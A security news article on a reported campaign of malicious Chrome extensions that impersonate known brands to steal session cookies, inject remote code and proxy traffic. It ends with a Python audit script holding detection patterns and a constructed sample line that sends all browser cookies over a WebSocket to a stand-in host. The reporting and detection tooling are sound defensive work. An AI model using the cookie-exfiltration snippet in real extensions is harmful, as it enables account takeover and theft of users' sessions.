A widespread campaign targeting Chrome browser users is using over 100 malicious extensions to steal data, inject remote scripts, and manipulate network traffic through the Google Chrome Web Store. These extensions mimic popular brands such as Fortinet, YouTube, DeepSeek AI, and Calendly.
Discovered by DomainTools researchers, the operation involves a network of fake domains that promote these extensions, increasing the likelihood of user downloads via malvertising. The campaign impersonates legitimate tools including VPNs, AI assistants, and crypto utilities, offering some expected functionality while secretly enabling backdoor access to user data.
“The Chrome Web Store has removed multiple of the actor’s malicious extensions after malware identification,” said the researchers.
“However, the actor’s persistence and the time lag in detection and removal pose a threat to users seeking productivity tools and browser enhancements.”
Extensions Used to Steal Cookies, Inject Code, and Act as Proxies
Once installed, the malicious Chrome extensions request dangerous permissions that allow them to:
- Steal browser cookies, including session tokens
- Perform DOM-based phishing
- Dynamically inject remote JavaScript code
- Act as network proxies
- Modify browser traffic to deliver ads or redirect sessions
One such extension, “fortivpn,” was observed using chrome.cookies.getAll({}) to capture all browser cookies. It compresses the data with Pako, encodes it in Base64, and sends it to a remote server (infograph[.]top).
The same extension can establish WebSocket connections and act as a proxy server, potentially rerouting user traffic through attacker-controlled infrastructure. It also supports proxy authentication, enabling more covert surveillance.
Fake Domains Impersonating Brands Found Across Campaign
DomainTools listed numerous fake domains pushing these malicious Chrome extensions, registered under names that imitate the impersonated brands.
These sites include deceptive “Add to Chrome” buttons that link directly to the Chrome Web Store, falsely reinforcing legitimacy.
While Google has removed many of the malicious extensions, some remain active, posing ongoing risk to users who seek browser enhancements or security tools.
Risks Include Account Takeover and Corporate Network Breaches
By stealing session cookies and acting as network proxies, the extensions allow attackers to:
- Hijack online accounts
- Monitor browsing behavior
- Gain unauthorized access to internal enterprise systems
- Breach corporate VPN devices or platforms
These extensions effectively give attackers full visibility into the user’s online activity and enable them to bypass authentication mechanisms by reusing stolen session tokens.
Security Recommendations for Enterprise Users
Enterprises are advised to:
- Scrutinize Chrome extension permissions before deployment
- Limit installation to extensions from known, trusted publishers
- Review user reviews and publisher reputation before installing
- Conduct browser extension audits across managed devices
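The cookie-exfiltration chain described for “fortivpn” (bulk cookie read, Pako compression, Base64 encoding, outbound WebSocket) and the audit recommended above can be checked statically. The following is an added example written for this article, not DomainTools’ or Google’s tooling; the permission set, regex patterns and the sample manifest/script are constructed here to mirror the behaviours the report names, and a real audit would add its own indicators.

```python
import json
import re
from pathlib import Path

# Permissions the report describes the extensions requesting (plus broad host access).
RISKY_PERMISSIONS = {"cookies", "proxy", "webRequest", "webRequestBlocking",
                     "scripting", "declarativeNetRequest", "<all_urls>"}

# Regex-to-label pairs; each corresponds to a behaviour named in the article.
BEHAVIOUR_PATTERNS = [
    (r"chrome\.cookies\.getAll\s*\(", "bulk cookie read (chrome.cookies.getAll)"),
    (r"pako\.(deflate|gzip)", "pako compression before exfiltration"),
    (r"\bbtoa\s*\(", "Base64 encoding of collected data"),
    (r"new\s+WebSocket\s*\(\s*['\"]wss?://", "outbound WebSocket connection"),
    (r"chrome\.proxy\.settings\.set", "proxy configuration change"),
    (r"\b(eval|new\s+Function)\s*\(", "dynamic code execution (remote script injection)"),
    (r"\bfetch\s*\(\s*['\"]https?://", "fetch to hard-coded remote host"),
]

def audit_extension(manifest: dict, scripts: dict) -> list:
    """Return human-readable findings for a parsed manifest plus {filename: source}."""
    findings = []
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    for p in sorted(perms & RISKY_PERMISSIONS):
        findings.append(f"manifest: risky permission '{p}'")
    for name, src in scripts.items():
        for pattern, label in BEHAVIOUR_PATTERNS:
            if re.search(pattern, src):
                findings.append(f"{name}: {label}")
    # Cookie read + encoding + a network channel together form the exfiltration chain.
    joined = " ".join(findings)
    if "getAll" in joined and "Base64" in joined and ("WebSocket" in joined or "fetch" in joined):
        findings.append("VERDICT: cookie exfiltration chain present; do not deploy")
    return findings

def audit_directory(path: Path) -> list:
    """Run the same check over an unpacked extension directory on disk."""
    manifest = json.loads((path / "manifest.json").read_text(encoding="utf-8"))
    scripts = {p.name: p.read_text(encoding="utf-8", errors="ignore") for p in path.rglob("*.js")}
    return audit_extension(manifest, scripts)

# Constructed sample imitating the described behaviour; not the real extension's code.
SAMPLE_MANIFEST = {"manifest_version": 3, "name": "VPN helper",
                   "permissions": ["cookies", "proxy", "storage"], "host_permissions": ["<all_urls>"]}
SAMPLE_BACKGROUND = """
const ws = new WebSocket('wss://example.invalid/c');
chrome.cookies.getAll({}, c => ws.send(btoa(pako.deflate(JSON.stringify(c), {to: 'string'}))));
"""
```

Run `audit_directory(Path("unpacked_extension"))` against a local copy of any extension under review; `audit_extension(SAMPLE_MANIFEST, {"background.js": SAMPLE_BACKGROUND})` shows the findings and verdict for the constructed sample.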
The operation highlights how browser-based threats remain a significant vector for data theft and corporate compromise, especially when leveraging trusted platforms like the Chrome Web Store.